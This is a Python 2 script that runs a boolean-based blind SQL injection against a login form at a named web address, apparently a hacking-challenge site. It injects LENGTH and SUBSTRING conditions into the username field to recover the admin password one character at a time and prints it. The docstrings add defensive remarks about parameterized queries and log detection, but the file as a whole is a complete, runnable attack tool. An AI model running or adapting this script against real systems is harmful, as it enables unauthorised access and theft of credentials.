- #!/usr/bin/python
- import urllib
# Login-form endpoint that every probe request in this script is POSTed to.
URL = "http://hakerium.cba.pl/zad1/"

# Running total of HTTP requests issued. It is incremented once per probe by
# main() and get_ith_password_char() and printed at the end of the run, so it
# also shows how much traffic the target's logs would contain.
REQUESTS = 0
def query_returned_rows(html):
    """Report whether a response page signals that the injected condition held.

    The only signal used is whether the literal text "logowanie." occurs in
    the response body. The script treats that text as proof that the login
    query matched a row, which is what turns the form into a true/false
    oracle. A login form that returns the same page for every failed attempt
    offers no such signal.

    Args:
        html: Response body as a string.

    Returns:
        True if the marker text is present, False otherwise.
    """
    marker = "logowanie."
    return marker in html
def get_ith_password_char(i):
    """Find the character at 1-based position *i* of the stored admin password.

    Each candidate from a fixed alphabet is tested with its own POST. The
    ``username`` field carries a quote-terminated fragment that adds a
    ``SUBSTRING(password, i, 1) = BINARY '<candidate>'`` condition. This only
    works if the server concatenates the field into its SQL text (presumed;
    the server code is not shown here). A parameterized query would treat
    the whole value as an ordinary, non-matching username.

    Seen from the server, this is a burst of near-identical POSTs whose
    ``username`` contains ``SUBSTRING(`` and a quote. That pattern is easy to
    flag in request logs or to throttle with per-client rate limits.

    Args:
        i: 1-based index into the password column.

    Returns:
        The matching character, or None (implicitly) if no candidate in the
        alphabet produced a positive response.
    """
    global REQUESTS
    alphabet = "QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm0123456789!@#$%^&*()-=[];',./<>?:|{}_+"
    for candidate in alphabet:
        injected_username = "admin' AND SUBSTRING(password,{},1)=BINARY '{}".format(i, candidate)
        form_body = urllib.urlencode({'username': injected_username, 'password': ''})
        response = urllib.urlopen(URL, form_body)
        REQUESTS += 1
        # Evaluate the oracle first, then close the handle on either outcome.
        matched = query_returned_rows(response.read())
        response.close()
        if matched:
            return candidate
def main():
    """Infer the admin password's length, then its characters, and print both.

    Phase 1 probes lengths 2..99 with a ``LENGTH(password)=N`` condition in
    the ``username`` field and stops at the first positive response. Phase 2
    calls get_ith_password_char() for every position and prints the partial
    result after each one. Finally it prints the password and the number of
    HTTP requests sent.

    Everything depends on two properties of the target, both presumed from
    the payloads rather than visible here: user input is spliced into the
    SQL string, and the response differs between "row found" and "no row".
    Bound parameters remove the first. A uniform failure response removes
    the second. The request counter printed at the end shows how noisy the
    technique is, which is why it stands out in access logs.
    """
    global REQUESTS

    # Phase 1: determine the length.
    password_len = 0
    for length_guess in xrange(2, 100):
        injected_username = "admin' AND LENGTH(password)={} OR '".format(length_guess)
        form_body = urllib.urlencode({'username': injected_username, 'password': ''})
        response = urllib.urlopen(URL, form_body)
        REQUESTS += 1
        if query_returned_rows(response.read()):
            password_len = length_guess
            print 'Password\'s length is {}.'.format(password_len)
            # NOTE: as in the original, the handle is not closed on this path.
            break
        response.close()

    # Phase 2: recover one character per position (positions are 1-based).
    # If no length matched, password_len stays 0 and this loop does not run.
    password = ""
    for position in xrange(1, password_len + 1):
        # get_ith_password_char() returns None when nothing matched, which
        # makes this concatenation raise TypeError.
        password += get_ith_password_char(position)
        print "Gotcha! Password so far is: {}".format(password)

    print
    print "Password: {}".format(password)
    print "Requests needed: {}".format(REQUESTS)
# Run the script body only when executed directly, not when imported.
if __name__ == "__main__":
    main()